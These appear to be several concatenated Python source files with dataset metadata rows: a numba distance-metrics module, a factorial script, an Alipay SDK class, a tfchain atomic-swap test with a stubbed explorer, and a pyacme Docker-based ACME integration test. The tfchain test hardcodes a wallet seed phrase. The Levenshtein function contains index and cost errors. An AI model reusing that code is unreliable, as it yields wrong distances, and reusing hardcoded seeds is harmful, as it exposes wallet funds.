return 10.0, np.array([0.0, 0.0, -1.0], dtype=np.float32)
dist = (
(mu_1 ** 2 + mu_2 ** 2) / np.abs(sigma)
+ 2 * np.log(np.abs(sigma))
+ np.log(2 * np.pi)
)
grad = np.empty(3, dtype=np.float32)
grad[0] = (2 * mu_1) / np.abs(sigma)
grad[1] = (2 * mu_2) / np.abs(sigma)
grad[2] = sigma_sign * (
-(mu_1 ** 2 + mu_2 ** 2) / (sigma ** 2) + (2 / np.abs(sigma))
)
return dist, grad
# Special discrete distances -- where x and y are objects, not vectors
def get_discrete_params(data, metric):
if metric == "ordinal":
return {"support_size": float(data.max() - data.min()) / 2.0}
elif metric == "count":
min_count = scipy.stats.tmin(data)
max_count = scipy.stats.tmax(data)
lambda_ = scipy.stats.tmean(data)
normalisation = count_distance(min_count, max_count, poisson_lambda=lambda_)
return {
"poisson_lambda": lambda_,
"normalisation": normalisation / 2.0, # heuristic
}
elif metric == "string":
lengths = np.array([len(x) for x in data])
max_length = scipy.stats.tmax(lengths)
max_dist = max_length / 1.5 # heuristic
normalisation = max_dist / 2.0 # heuristic
return {"normalisation": normalisation, "max_dist": max_dist / 2.0} # heuristic
else:
return {}
@numba.jit()
def categorical_distance(x, y):
if x == y:
return 0.0
else:
return 1.0
@numba.jit()
def hierarchical_categorical_distance(x, y, cat_hierarchy=[{}]):
n_levels = float(len(cat_hierarchy))
for level, cats in enumerate(cat_hierarchy):
if cats[x] == cats[y]:
return float(level) / n_levels
else:
return 1.0
@numba.njit()
def ordinal_distance(x, y, support_size=1.0):
return abs(x - y) / support_size
@numba.jit()
def count_distance(x, y, poisson_lambda=1.0, normalisation=1.0):
lo = int(min(x, y))
hi = int(max(x, y))
log_lambda = np.log(poisson_lambda)
if lo < 2:
log_k_factorial = 0.0
elif lo < 10:
log_k_factorial = 0.0
for k in range(2, lo):
log_k_factorial += np.log(k)
else:
log_k_factorial = approx_log_Gamma(lo + 1)
result = 0.0
for k in range(lo, hi):
result += k * log_lambda - poisson_lambda - log_k_factorial
log_k_factorial += np.log(k)
return result / normalisation
@numba.njit()
def levenshtein(x, y, normalisation=1.0, max_distance=20):
x_len, y_len = len(x), len(y)
# Opt out of some comparisons
if abs(x_len - y_len) > max_distance:
return abs(x_len - y_len) / normalisation
v0 = np.arange(y_len + 1).astype(np.float64)
v1 = np.zeros(y_len + 1)
for i in range(x_len):
v1[i] = i + 1
for j in range(y_len):
deletion_cost = v0[j + 1] + 1
insertion_cost = v1[j] + 1
substitution_cost = int(x[i] == y[j])
v1[j + 1] = min(deletion_cost, insertion_cost, substitution_cost)
v0 = v1
# Abort early if we've already exceeded max_dist
if np.min(v0) > max_distance:
return max_distance / normalisation
return v0[y_len] / normalisation
named_distances = {
# general minkowski distances
"euclidean": euclidean,
"l2": euclidean,
"manhattan": manhattan,
"taxicab": manhattan,
"l1": manhattan,
"chebyshev": chebyshev,
"linfinity": chebyshev,
"linfty": chebyshev,
"linf": chebyshev,
"minkowski": minkowski,
"poincare": poincare,
# Standardised/weighted distances
"seuclidean": standardised_euclidean,
"standardised_euclidean": standardised_euclidean,
"wminkowski": weighted_minkowski,
"weighted_minkowski": weighted_minkowski,
"mahalanobis": mahalanobis,
# Other distances
"canberra": canberra,
"cosine": cosine,
"correlation": correlation,
"hellinger": hellinger,
"haversine": haversine,
"braycurtis": bray_curtis,
"ll_dirichlet": ll_dirichlet,
"symmetric_kl": symmetric_kl,
# Binary distances
"hamming": hamming,
"jaccard": jaccard,
"dice": dice,
"matching": matching,
"kulsinski": kulsinski,
"rogerstanimoto": rogers_tanimoto,
"russellrao": russellrao,
"sokalsneath": sokal_sneath,
"sokalmichener": sokal_michener,
"yule": yule,
# Special discrete distances
"categorical": categorical_distance,
"ordinal": ordinal_distance,
"hierarchical_categorical": hierarchical_categorical_distance,
"count": count_distance,
"string": levenshtein,
}
named_distances_with_gradients = {
# general minkowski distances
"euclidean": euclidean_grad,
"l2": euclidean_grad,
"manhattan": manhattan_grad,
"taxicab": manhattan_grad,
"l1": manhattan_grad,
"chebyshev": chebyshev_grad,
"linfinity": chebyshev_grad,
"linfty": chebyshev_grad,
"linf": chebyshev_grad,
"minkowski": minkowski_grad,
# Standardised/weighted distances
"seuclidean": standardised_euclidean_grad,
"standardised_euclidean": standardised_euclidean_grad,
"wminkowski": weighted_minkowski_grad,
"weighted_minkowski": weighted_minkowski_grad,
"mahalanobis": mahalanobis_grad,
# Other distances
"canberra": canberra_grad,
"cosine": cosine_grad,
"correlation": correlation_grad,
"hellinger": hellinger_grad,
"haversine": haversine_grad,
"braycurtis": bray_curtis_grad,
"symmetric_kl": symmetric_kl_grad,
# Special embeddings
"spherical_gaussian_energy": spherical_gaussian_energy_grad,
"diagonal_gaussian_energy": diagonal_gaussian_energy_grad,
"gaussian_energy": gaussian_energy_grad,
"hyperboloid": hyperboloid_grad,
}
DISCRETE_METRICS = (
"categorical",
"hierarchical_categorical",
"ordinal",
"count",
"string",
)
SPECIAL_METRICS = (
"hellinger",
"ll_dirichlet",
"symmetric_kl",
"poincare",
hellinger,
ll_dirichlet,
symmetric_kl,
poincare,
)
@numba.njit(parallel=True)
def parallel_special_metric(X, Y=None, metric=hellinger):
if Y is None:
result = np.zeros((X.shape[0], X.shape[0]))
for i in range(X.shape[0]):
for j in range(i + 1, X.shape[0]):
result[i, j] = metric(X[i], X[j])
result[j, i] = result[i, j]
else:
result = np.zeros((X.shape[0], Y.shape[0]))
for i in range(X.shape[0]):
for j in range(Y.shape[0]):
result[i, j] = metric(X[i], Y[j])
return result
# We can gain efficiency by chunking the matrix into blocks;
# this keeps data vectors in cache better
@numba.njit(parallel=True, nogil=True)
def chunked_parallel_special_metric(X, Y=None, metric=hellinger, chunk_size=16):
if Y is None:
XX, symmetrical = X, True
row_size = col_size = X.shape[0]
else:
XX, symmetrical = Y, False
row_size, col_size = X.shape[0], Y.shape[0]
result = np.zeros((row_size, col_size), dtype=np.float32)
n_row_chunks = (row_size // chunk_size) + 1
for chunk_idx in numba.prange(n_row_chunks):
n = chunk_idx * chunk_size
chunk_end_n = min(n + chunk_size, row_size)
m_start = n if symmetrical else 0
for m in range(m_start, col_size, chunk_size):
chunk_end_m = min(m + chunk_size, col_size)
for i in range(n, chunk_end_n):
for j in range(m, chunk_end_m):
result[i, j] = metric(X[i], XX[j])
return result
def pairwise_special_metric(X, Y=None, metric="hellinger", kwds=None):
if callable(metric):
if kwds is not None:
kwd_vals = tuple(kwds.values())
else:
kwd_vals = ()
@numba.njit(fastmath=True)
def _partial_metric(_X, _Y=None):
return metric(_X, _Y, *kwd_vals)
return pairwise_distances(X, Y, metric=_partial_metric)
else:
special_metric_func = named_distances[metric]
return parallel_special_metric(X, Y, metric=special_metric_func)
| 26.690238 | 117 | 0.550455 |
e8ccde3e8dc4e79ff40104fc8e4b508cde6cf61e | 130 | py | Python | Experiment1/E1.py | menaka121/pythonTuts | 8ec48182a38dd656fc64df8b6ae5ac83a372790a | [
"Apache-2.0"
] | null | null | null | Experiment1/E1.py | menaka121/pythonTuts | 8ec48182a38dd656fc64df8b6ae5ac83a372790a | [
"Apache-2.0"
] | null | null | null | Experiment1/E1.py | menaka121/pythonTuts | 8ec48182a38dd656fc64df8b6ae5ac83a372790a | [
"Apache-2.0"
] | null | null | null | # Factorial using python
def fact(n):
if n == 0:
return 1
else:
return n * fact(n-1)
print(fact(100))
| 10.833333 | 28 | 0.523077 |
09fc99e4868d0768a7485bbddaa06ef1feab52e6 | 458 | py | Python | alipay/aop/api/response/AlipayEbppInvoiceRegisterModifyResponse.py | antopen/alipay-sdk-python-all | 8e51c54409b9452f8d46c7bb10eea7c8f7e8d30c | [
"Apache-2.0"
] | 213 | 2018-08-27T16:49:32.000Z | 2021-12-29T04:34:12.000Z | alipay/aop/api/response/AlipayEbppInvoiceRegisterModifyResponse.py | antopen/alipay-sdk-python-all | 8e51c54409b9452f8d46c7bb10eea7c8f7e8d30c | [
"Apache-2.0"
] | 29 | 2018-09-29T06:43:00.000Z | 2021-09-02T03:27:32.000Z | alipay/aop/api/response/AlipayEbppInvoiceRegisterModifyResponse.py | antopen/alipay-sdk-python-all | 8e51c54409b9452f8d46c7bb10eea7c8f7e8d30c | [
"Apache-2.0"
] | 59 | 2018-08-27T16:59:26.000Z | 2022-03-25T10:08:15.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.response.AlipayResponse import AlipayResponse
class AlipayEbppInvoiceRegisterModifyResponse(AlipayResponse):
def __init__(self):
super(AlipayEbppInvoiceRegisterModifyResponse, self).__init__()
def parse_response_content(self, response_content):
response = super(AlipayEbppInvoiceRegisterModifyResponse, self).parse_response_content(response_content)
| 28.625 | 112 | 0.78821 |
34040bb55a90dddd502c5dc5c7c99ae704d3cf27 | 15,354 | py | Python | tests/jstests/12_atomicswap_verify_sender.py | xmonader/pytfchain | ef28238eeaedda1dd5ea8055ea6dc2ca6baa263c | [
"Apache-2.0"
] | null | null | null | tests/jstests/12_atomicswap_verify_sender.py | xmonader/pytfchain | ef28238eeaedda1dd5ea8055ea6dc2ca6baa263c | [
"Apache-2.0"
] | null | null | null | tests/jstests/12_atomicswap_verify_sender.py | xmonader/pytfchain | ef28238eeaedda1dd5ea8055ea6dc2ca6baa263c | [
"Apache-2.0"
] | null | null | null | from Jumpscale import j
import pytest
from Jumpscale.clients.blockchain.tfchain.stub.ExplorerClientStub import TFChainExplorerGetClientStub
def main(self):
"""
to run:
js_shell 'j.clients.tfchain.test(name="atomicswap_verify_sender")'
"""
# create a tfchain client for devnet
c = j.clients.tfchain.new("mytestclient", network_type="TEST")
# or simply `c = j.tfchain.clients.mytestclient`, should the client already exist
# (we replace internal client logic with custom logic as to ensure we can test without requiring an active network)
explorer_client = TFChainExplorerGetClientStub()
# add the blockchain info
explorer_client.chain_info = '{"blockid":"5c86c987668ca47948a149413f4f004651249073eff4f144fd26b50e218705a8","difficulty":"30203","estimatedactivebs":"2365","height":16639,"maturitytimestamp":1549646167,"target":[0,2,43,120,39,20,204,42,102,32,125,110,53,77,39,71,99,124,13,223,197,154,115,42,126,62,185,120,208,177,21,190],"totalcoins":"0","arbitrarydatatotalsize":4328,"minerpayoutcount":16721,"transactioncount":17262,"coininputcount":633,"coinoutputcount":1225,"blockstakeinputcount":16639,"blockstakeoutputcount":16640,"minerfeecount":622,"arbitrarydatacount":572}'
explorer_client.hash_add('5c86c987668ca47948a149413f4f004651249073eff4f144fd26b50e218705a8', '{"hashtype":"blockid","block":{"minerpayoutids":["84b378d60cbdd78430b39c8eddf226119b6f28256388557dd15f0b046bf3c3ed"],"transactions":[{"id":"9aec9f849e35f0bdd14c5ea9daed20c8fbfa09f5a6771bb46ce787eb7e2b00a0","height":16639,"parent":"5c86c987668ca47948a149413f4f004651249073eff4f144fd26b50e218705a8","rawtransaction":{"version":1,"data":{"coininputs":null,"blockstakeinputs":[{"parentid":"144b2b7711fda335cdae5865ab3729d641266087bc4e088d9fba806345045903","fulfillment":{"type":1,"data":{"publickey":"ed25519:d285f92d6d449d9abb27f4c6cf82713cec0696d62b8c123f1627e054dc6d7780","signature":"f09af1c62026aed18d1d8f80e5a7bd4947a6cb5b6b69097c5b10cb983f0d729662c511a4852fa63690884e2b5c600e3935e08b81aaa757d9f0eb740292ec8309"}}}],"blockstakeoutputs":[{"value":"3000","condition":{"type":1,"data":{"unlockhash":"015a080a9259b9d4aaa550e2156f49b1a79a64c7ea463d810d4493e8242e6791584fbdac553e6f"}}}],"minerfees":null}},"coininputoutputs":null,"coinoutputids":null,"coinoutputunlockhashes":null,"blockstakeinputoutputs":[{"value":"3000","condition":{"type":1,"data":{"unlockhash":"015a080a9259b9d4aaa550e2156f49b1a79a64c7ea463d810d4493e8242e6791584fbdac553e6f"}},"unlockhash":"015a080a9259b9d4aaa550e2156f49b1a79a64c7ea463d810d4493e8242e6791584fbdac553e6f"}],"blockstakeoutputids":["83aa29b3e77f703526e28fbc0d2bfcf2b66c06b665e11cb5535b9575fd0e8105"],"blockstakeunlockhashes":["015a080a9259b9d4aaa550e2156f49b1a79a64c7ea463d810d4493e8242e6791584fbdac553e6f"],"unconfirmed":false}],"rawblock":{"parentid":"8485f94209bf3e01ed169244ab2072ebb0d1c5dc589c95b39a3fbab3641b7a7e","timestamp":1549646257,"pobsindexes":{"BlockHeight":16638,"TransactionIndex":0,"OutputIndex":0},"minerpayouts":[{"value":"10000000000","unlockhash":"015a080a9259b9d4aaa550e2156f49b1a79a64c7ea463d810d4493e8242e6791584fbdac553e6f"}],"transactions":[{"version":1,"data":{"coininputs":null,"blockstakeinputs":[{"parentid":"144b2b7711fda335cdae5865ab3729d641266087bc4e088d9fba806345045903","fulfillment":{"type":1,"data":{"publickey":"ed25519:d285f92d6d449d9abb27f4c6cf82713cec0696d62b8c123f1627e054dc6d7780","signature":"f09af1c62026aed18d1d8f80e5a7bd4947a6cb5b6b69097c5b10cb983f0d729662c511a4852fa63690884e2b5c600e3935e08b81aaa757d9f0eb740292ec8309"}}}],"blockstakeoutputs":[{"value":"3000","condition":{"type":1,"data":{"unlockhash":"015a080a9259b9d4aaa550e2156f49b1a79a64c7ea463d810d4493e8242e6791584fbdac553e6f"}}}],"minerfees":null}}]},"blockid":"5c86c987668ca47948a149413f4f004651249073eff4f144fd26b50e218705a8","difficulty":"30203","estimatedactivebs":"2365","height":16639,"maturitytimestamp":1549646167,"target":[0,2,43,120,39,20,204,42,102,32,125,110,53,77,39,71,99,124,13,223,197,154,115,42,126,62,185,120,208,177,21,190],"totalcoins":"0","arbitrarydatatotalsize":4328,"minerpayoutcount":16721,"transactioncount":17262,"coininputcount":633,"coinoutputcount":1225,"blockstakeinputcount":16639,"blockstakeoutputcount":16640,"minerfeecount":622,"arbitrarydatacount":572},"blocks":null,"transaction":{"id":"0000000000000000000000000000000000000000000000000000000000000000","height":0,"parent":"0000000000000000000000000000000000000000000000000000000000000000","rawtransaction":{"version":0,"data":{"coininputs":[],"minerfees":null}},"coininputoutputs":null,"coinoutputids":null,"coinoutputunlockhashes":null,"blockstakeinputoutputs":null,"blockstakeoutputids":null,"blockstakeunlockhashes":null,"unconfirmed":false},"transactions":null,"multisigaddresses":null,"unconfirmed":false}')
# override internal functionality, as to use our stub client
c._explorer_get = explorer_client.explorer_get
c._explorer_post = explorer_client.explorer_post
# a wallet is required to initiate an atomic swap contract
w = c.wallets.new("mytestwallet", seed='remain solar kangaroo welcome clean object friend later bounce strong ship lift hamster afraid you super dolphin warm emotion curve smooth kiss stem diet')
# one can verify that its transaction is sent as sender,
# not super useful, but it does also contain an optional check to know if it is already refundable
# verification will fail if the contract could not be found
with pytest.raises(tfchain.errors.AtomicSwapContractNotFound):
w.atomicswap.verify('023b1c17a01945573933e62ca7a1297057681622aaea52c4c4e198077a263890')
# add the coin output info of the submitted atomic swap contract
explorer_client.hash_add('023b1c17a01945573933e62ca7a1297057681622aaea52c4c4e198077a263890', '{"hashtype":"coinoutputid","block":{"minerpayoutids":null,"transactions":null,"rawblock":{"parentid":"0000000000000000000000000000000000000000000000000000000000000000","timestamp":0,"pobsindexes":{"BlockHeight":0,"TransactionIndex":0,"OutputIndex":0},"minerpayouts":null,"transactions":null},"blockid":"0000000000000000000000000000000000000000000000000000000000000000","difficulty":"0","estimatedactivebs":"0","height":0,"maturitytimestamp":0,"target":[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],"totalcoins":"0","arbitrarydatatotalsize":0,"minerpayoutcount":0,"transactioncount":0,"coininputcount":0,"coinoutputcount":0,"blockstakeinputcount":0,"blockstakeoutputcount":0,"minerfeecount":0,"arbitrarydatacount":0},"blocks":null,"transaction":{"id":"0000000000000000000000000000000000000000000000000000000000000000","height":0,"parent":"0000000000000000000000000000000000000000000000000000000000000000","rawtransaction":{"version":0,"data":{"coininputs":[],"minerfees":null}},"coininputoutputs":null,"coinoutputids":null,"coinoutputunlockhashes":null,"blockstakeinputoutputs":null,"blockstakeoutputids":null,"blockstakeunlockhashes":null,"unconfirmed":false},"transactions":[{"id":"4a7ac7930379675c82d0462a86e6d6f4018bdb2bdabaf49f4c177b8de19b4e7c","height":16930,"parent":"c25f345403080b8372a38f66608aa5a2287bdc61b82efe5ee6503ce85e8bcd35","rawtransaction":{"version":1,"data":{"coininputs":[{"parentid":"753aaeaa0c9e6c9f1f8da1974c83d8ca067ad536f464a2e2fc038bbd0404d084","fulfillment":{"type":1,"data":{"publickey":"ed25519:e4f55bc46b5feb37c03a0faa2d624a9ee1d0deb5059aaa9625d8b4f60f29bcab","signature":"b5081e41797f53233c727c344698400a73f2cdd364e241df915df413d3eeafb425ce9b51de3731bcbf830c399a706f4d24ae7066f947a4a36ae1b25415bcde00"}}}],"coinoutputs":[{"value":"50000000000","condition":{"type":2,"data":{"sender":"01b73c4e869b6167abe6180ebe7a907f56e0357b4a2f65eb53d22baad84650eb62fce66ba036d0","receiver":"01746b199781ea316a44183726f81e0734d93e7cefc18e9a913989821100aafa33e6eb7343fa8c","hashedsecret":"4163d4b31a1708cd3bb95a0a8117417bdde69fd1132909f92a8ec1e3fe2ccdba","timelock":1549736249}}}],"minerfees":["1000000000"]}},"coininputoutputs":[{"value":"51000000000","condition":{"type":1,"data":{"unlockhash":"01b73c4e869b6167abe6180ebe7a907f56e0357b4a2f65eb53d22baad84650eb62fce66ba036d0"}},"unlockhash":"01b73c4e869b6167abe6180ebe7a907f56e0357b4a2f65eb53d22baad84650eb62fce66ba036d0"}],"coinoutputids":["023b1c17a01945573933e62ca7a1297057681622aaea52c4c4e198077a263890"],"coinoutputunlockhashes":["02fb27c67c373c2f30611e0b98bf92ed6e6eb0a69b471457b282903945180cd5c5b8068731f767"],"blockstakeinputoutputs":null,"blockstakeoutputids":null,"blockstakeunlockhashes":null,"unconfirmed":false}],"multisigaddresses":null,"unconfirmed":false}')
# one can verify it all manually
contract = w.atomicswap.verify('023b1c17a01945573933e62ca7a1297057681622aaea52c4c4e198077a263890')
assert contract.outputid == '023b1c17a01945573933e62ca7a1297057681622aaea52c4c4e198077a263890'
assert contract.amount == '50 TFT'
assert contract.refund_timestamp == 1549736249
assert contract.sender == '01b73c4e869b6167abe6180ebe7a907f56e0357b4a2f65eb53d22baad84650eb62fce66ba036d0'
assert contract.receiver == '01746b199781ea316a44183726f81e0734d93e7cefc18e9a913989821100aafa33e6eb7343fa8c'
assert contract.secret_hash == '4163d4b31a1708cd3bb95a0a8117417bdde69fd1132909f92a8ec1e3fe2ccdba'
# the amount can however be verified automatically
w.atomicswap.verify('023b1c17a01945573933e62ca7a1297057681622aaea52c4c4e198077a263890', amount=50)
# which will fail if the amount is wrong
with pytest.raises(tfchain.errors.AtomicSwapContractInvalid):
w.atomicswap.verify('023b1c17a01945573933e62ca7a1297057681622aaea52c4c4e198077a263890', amount=42)
# the secret hash can be verified as well, not so important as the sender,
# would be more used if one is the receiver, but it is possible none the less.
w.atomicswap.verify('023b1c17a01945573933e62ca7a1297057681622aaea52c4c4e198077a263890', secret_hash='4163d4b31a1708cd3bb95a0a8117417bdde69fd1132909f92a8ec1e3fe2ccdba')
# which will fail if the secret hash is wrong
with pytest.raises(tfchain.errors.AtomicSwapContractInvalid):
w.atomicswap.verify('023b1c17a01945573933e62ca7a1297057681622aaea52c4c4e198077a263890', secret_hash='4163d4b31a1708cd3bb95a0a8117417bdde69fd1132909f92a8ec1e3fe2ccdbb')
# a minimum duration can also be defined, where the duration defines how long it takes until the
# contract becomes refundable, 0 if already assumed to be refundable
w.atomicswap.verify('023b1c17a01945573933e62ca7a1297057681622aaea52c4c4e198077a263890', min_refund_time='+1d')
# which will fail if assumed wrong
with pytest.raises(tfchain.errors.AtomicSwapContractInvalid):
w.atomicswap.verify('023b1c17a01945573933e62ca7a1297057681622aaea52c4c4e198077a263890', min_refund_time=0)
# if one is assumed to be the sender, it can also be verified automatically
w.atomicswap.verify('023b1c17a01945573933e62ca7a1297057681622aaea52c4c4e198077a263890', sender=True)
# if one assumed its position wrong, it will however fail
with pytest.raises(tfchain.errors.AtomicSwapContractInvalid):
w.atomicswap.verify('023b1c17a01945573933e62ca7a1297057681622aaea52c4c4e198077a263890', receiver=True)
# all can be verified at once of course
w.atomicswap.verify('023b1c17a01945573933e62ca7a1297057681622aaea52c4c4e198077a263890',
amount=50, secret_hash='4163d4b31a1708cd3bb95a0a8117417bdde69fd1132909f92a8ec1e3fe2ccdba',
min_refund_time='+1d', sender=True)
# once the refund time has been reached, it does become refundable, and min_refund_time=0 should validate correctly
explorer_client.hash_add('5c86c987668ca47948a149413f4f004651249073eff4f144fd26b50e218705a8', '{"hashtype":"blockid","block":{"minerpayoutids":["84b378d60cbdd78430b39c8eddf226119b6f28256388557dd15f0b046bf3c3ed"],"transactions":[{"id":"9aec9f849e35f0bdd14c5ea9daed20c8fbfa09f5a6771bb46ce787eb7e2b00a0","height":16639,"parent":"5c86c987668ca47948a149413f4f004651249073eff4f144fd26b50e218705a8","rawtransaction":{"version":1,"data":{"coininputs":null,"blockstakeinputs":[{"parentid":"144b2b7711fda335cdae5865ab3729d641266087bc4e088d9fba806345045903","fulfillment":{"type":1,"data":{"publickey":"ed25519:d285f92d6d449d9abb27f4c6cf82713cec0696d62b8c123f1627e054dc6d7780","signature":"f09af1c62026aed18d1d8f80e5a7bd4947a6cb5b6b69097c5b10cb983f0d729662c511a4852fa63690884e2b5c600e3935e08b81aaa757d9f0eb740292ec8309"}}}],"blockstakeoutputs":[{"value":"3000","condition":{"type":1,"data":{"unlockhash":"015a080a9259b9d4aaa550e2156f49b1a79a64c7ea463d810d4493e8242e6791584fbdac553e6f"}}}],"minerfees":null}},"coininputoutputs":null,"coinoutputids":null,"coinoutputunlockhashes":null,"blockstakeinputoutputs":[{"value":"3000","condition":{"type":1,"data":{"unlockhash":"015a080a9259b9d4aaa550e2156f49b1a79a64c7ea463d810d4493e8242e6791584fbdac553e6f"}},"unlockhash":"015a080a9259b9d4aaa550e2156f49b1a79a64c7ea463d810d4493e8242e6791584fbdac553e6f"}],"blockstakeoutputids":["83aa29b3e77f703526e28fbc0d2bfcf2b66c06b665e11cb5535b9575fd0e8105"],"blockstakeunlockhashes":["015a080a9259b9d4aaa550e2156f49b1a79a64c7ea463d810d4493e8242e6791584fbdac553e6f"],"unconfirmed":false}],"rawblock":{"parentid":"8485f94209bf3e01ed169244ab2072ebb0d1c5dc589c95b39a3fbab3641b7a7e","timestamp":1549791703,"pobsindexes":{"BlockHeight":16638,"TransactionIndex":0,"OutputIndex":0},"minerpayouts":[{"value":"10000000000","unlockhash":"015a080a9259b9d4aaa550e2156f49b1a79a64c7ea463d810d4493e8242e6791584fbdac553e6f"}],"transactions":[{"version":1,"data":{"coininputs":null,"blockstakeinputs":[{"parentid":"144b2b7711fda335cdae5865ab3729d641266087bc4e088d9fba806345045903","fulfillment":{"type":1,"data":{"publickey":"ed25519:d285f92d6d449d9abb27f4c6cf82713cec0696d62b8c123f1627e054dc6d7780","signature":"f09af1c62026aed18d1d8f80e5a7bd4947a6cb5b6b69097c5b10cb983f0d729662c511a4852fa63690884e2b5c600e3935e08b81aaa757d9f0eb740292ec8309"}}}],"blockstakeoutputs":[{"value":"3000","condition":{"type":1,"data":{"unlockhash":"015a080a9259b9d4aaa550e2156f49b1a79a64c7ea463d810d4493e8242e6791584fbdac553e6f"}}}],"minerfees":null}}]},"blockid":"5c86c987668ca47948a149413f4f004651249073eff4f144fd26b50e218705a8","difficulty":"30203","estimatedactivebs":"2365","height":16639,"maturitytimestamp":1549646167,"target":[0,2,43,120,39,20,204,42,102,32,125,110,53,77,39,71,99,124,13,223,197,154,115,42,126,62,185,120,208,177,21,190],"totalcoins":"0","arbitrarydatatotalsize":4328,"minerpayoutcount":16721,"transactioncount":17262,"coininputcount":633,"coinoutputcount":1225,"blockstakeinputcount":16639,"blockstakeoutputcount":16640,"minerfeecount":622,"arbitrarydatacount":572},"blocks":null,"transaction":{"id":"0000000000000000000000000000000000000000000000000000000000000000","height":0,"parent":"0000000000000000000000000000000000000000000000000000000000000000","rawtransaction":{"version":0,"data":{"coininputs":[],"minerfees":null}},"coininputoutputs":null,"coinoutputids":null,"coinoutputunlockhashes":null,"blockstakeinputoutputs":null,"blockstakeoutputids":null,"blockstakeunlockhashes":null,"unconfirmed":false},"transactions":null,"multisigaddresses":null,"unconfirmed":false}', force=True)
# we should be able to refund at this point
w.atomicswap.verify('023b1c17a01945573933e62ca7a1297057681622aaea52c4c4e198077a263890',
amount=50, secret_hash='4163d4b31a1708cd3bb95a0a8117417bdde69fd1132909f92a8ec1e3fe2ccdba',
min_refund_time=0, sender=True)
| 178.534884 | 3,548 | 0.823824 |
be12e7c9c3d50c296a1cb865edf76e532e01511c | 7,777 | py | Python | test/test_integration.py | Juniormin123/pyacme | 99e844e44fac78ab3e1a0a73f6f6fa8f313489f3 | [
"MIT"
] | null | null | null | test/test_integration.py | Juniormin123/pyacme | 99e844e44fac78ab3e1a0a73f6f6fa8f313489f3 | [
"MIT"
] | null | null | null | test/test_integration.py | Juniormin123/pyacme | 99e844e44fac78ab3e1a0a73f6f6fa8f313489f3 | [
"MIT"
] | null | null | null | from pyacme.settings import LETSENCRYPT_STAGING
import pytest
from conftest import Path
from conftest import settings
from test_common import *
@pytest.fixture(scope='class')
def root_host_entry(request):
marker = request.node.get_closest_marker('host_entry')
if marker is None:
return
add_host_entry(*marker.args)
@pytest.fixture(scope='class')
def setup_pebble_docker(request, root_host_entry):
# override start_pebble_docker form conftest.py
marker = request.node.get_closest_marker('docker_type')
if marker.args[0] == 'standalone':
print('using standalone container setup')
# override start_pebble_docker() from conftest.py;
# only run the pebble container, without challtest
container_name = time.strftime(settings.BAK_TIME_FMT, time.localtime())
container_name = 'pebble_' + container_name
run_pebble_standalone_container(container_name)
print(f'running container {container_name}')
yield
stop_pebble_standalone_container(container_name)
elif marker.args[0] is None:
# do not run any container
yield
@pytest.fixture(scope='function')
def aliyun_access_key() -> Dict[str, str]:
try:
with open('./.aliyun_dns_api.json') as f:
return json.load(f)
except FileNotFoundError:
try:
with open('test/.aliyun_dns_api.json') as f:
return json.load(f)
except FileNotFoundError:
# for ci test
return {
'access_key': os.environ['ALIYUN_AK'],
'secret': os.environ['ALIYUN_S'],
}
# def get_aliyun_access_key(key_file: str) -> Dict[str, str]:
# with open(key_file, 'r') as f:
# return json.load(f)
def run_test_main(**main_param) -> None:
run_arg = []
param_dict = {
'country_code': '-C',
'csr_subjects': '--csr_subjects',
'account_private_key': '--account_private_key',
'not_before': '--not_before',
'not_after': '--not_after',
'working_directory': '-w',
'mode': '-m',
'dnsprovider': '--dnsprovider',
'access_key': '-k',
'secret': '-s',
'dns_specifics': '--dns_specifics',
'CA_entry': '--CA_entry',
'poll_interval': '--poll_interval',
'poll_retry_count': '--poll_retry_count',
'csr_priv_key_type': '--csr_priv_key_type',
'csr_priv_key_size': '--csr_priv_key_size',
'chall_resp_server_port': '--chall_resp_server_port',
}
for d in main_param['domain']:
run_arg += ['-d', d]
del main_param['domain']
for c in main_param['contact']:
run_arg += ['-c', c]
del main_param['contact']
if ('no_ssl_verify' in main_param) and main_param['no_ssl_verify']:
run_arg += ['--no_ssl_verify']
del main_param['no_ssl_verify']
if ('debug' in main_param) and main_param['debug']:
run_arg += ['--debug']
del main_param['debug']
for k, v in main_param.items():
run_arg += [param_dict[k], v]
main_entry_point_test(run_arg)
def _common(params: dict, ca = 'pebble'):
# assert subprocess_run_pyacme(**params).returncode == 0
run_test_main(**params)
if 'working_directory' in params:
wd = Path(params['working_directory']).expanduser().absolute()
else:
wd = Path(settings.WD_DEFAULT).expanduser().absolute()
wd = wd / '_'.join(params['domain']) # domain must exist
root_cert = 'pebble-root-cert.pem'
if ca == 'pebble':
download_root_cert(wd/settings.WD_CERT)
root_cert = 'pebble-root-cert.pem'
elif ca == 'staging':
root_cert = 'fake_root.pem'
download_root_cert(wd/settings.WD_CERT, STAGING_ROOT_CA, root_cert)
verify_p = openssl_verify(
cert_path=wd/settings.WD_CERT/settings.CERT_NAME,
chain_path=wd/settings.WD_CERT/settings.CERT_CHAIN,
root_cert_path=wd/settings.WD_CERT,
root_cert_name=root_cert
)
assert verify_p.returncode == 0
_DOMAIN = ['test-integration.local']
_MULTI_DOMAIN = ['a.test-integration.local', 'b.test-integration.local']
_HTTP_MODE_COMMON_PARAM_PORTION = dict(
contact=TEST_CONTACTS,
country_code='UN',
CA_entry=PEBBLE_TEST,
mode='http',
no_ssl_verify=True,
chall_resp_server_port=PY_HTTPSERVER_PORT,
)
http_mode_params = [
pytest.param(
dict(domain=_DOMAIN, **_HTTP_MODE_COMMON_PARAM_PORTION),
id='http_mode_single_domain'
),
pytest.param(
dict(domain=_MULTI_DOMAIN, **_HTTP_MODE_COMMON_PARAM_PORTION),
id='http_mode_multi_domain'
),
pytest.param(
dict(
domain=_MULTI_DOMAIN,
working_directory='~/.pyacme/new',
**_HTTP_MODE_COMMON_PARAM_PORTION
),
id='http_mode_multi_domain_new_wd'
),
pytest.param(
dict(
domain=_DOMAIN,
**_HTTP_MODE_COMMON_PARAM_PORTION,
csr_priv_key_type='es256'
),
id='http_mode_single_domain_es256'
),
pytest.param(
dict(
domain=_MULTI_DOMAIN,
**_HTTP_MODE_COMMON_PARAM_PORTION,
csr_priv_key_type='es256'
),
id='http_mode_multi_domain_es256'
),
]
@pytest.mark.httptest
@pytest.mark.docker_type('standalone')
@pytest.mark.host_entry(_DOMAIN+_MULTI_DOMAIN, '127.0.0.1')
@pytest.mark.usefixtures('setup_pebble_docker')
class TestHttpMode:
@pytest.mark.parametrize('params', http_mode_params)
def test_http_mode(self, params):
_common(params)
